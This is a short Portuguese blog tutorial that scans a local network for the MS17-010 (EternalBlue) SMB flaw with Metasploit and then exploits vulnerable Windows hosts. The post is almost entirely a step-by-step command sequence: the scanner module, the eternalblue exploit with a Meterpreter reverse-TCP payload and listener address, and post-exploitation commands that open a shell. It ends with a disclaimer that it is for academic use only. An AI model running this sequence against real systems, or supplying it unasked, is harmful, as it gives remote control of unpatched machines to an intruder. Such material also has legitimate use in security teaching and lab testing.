Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.
A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/
Comandos dentro do Kali Linux
# service postgresql start
# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Pos invasão
sysinfo
getuid
shell
E por ai vai...
Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!
Junior
Blog posts
- 2022 (4)
- 2021 (2)
- 2020 (7)
- 2019 (31)
- Novembre (1)
- Ottobre (2)
- Settembre (3)
- Agosto (4)
- Luglio (5)
- Giugno (3)
- Aprile (3)
- Marzo (4)
- Febbraio (4)
- Gennaio (2)
- 2018 (21)
- Dicembre (3)
- Novembre (4)
- Ottobre (2)
- Settembre (3)
- Luglio (3)
- Giugno (1)
- Maggio (1)
- Aprile (1)
- Marzo (1)
- Febbraio (2)
- 2017 (29)
- Dicembre (1)
- Novembre (4)
- Ottobre (2)
- Settembre (2)
- Agosto (1)
- Luglio (6)
- Giugno (3)
- Maggio (1)
- Aprile (1)
- Marzo (5)
- Febbraio (1)
- Gennaio (2)
- 2016 (17)
- 2015 (7)
- 2014 (7)
- 2013 (24)
1 friend
0 communities
None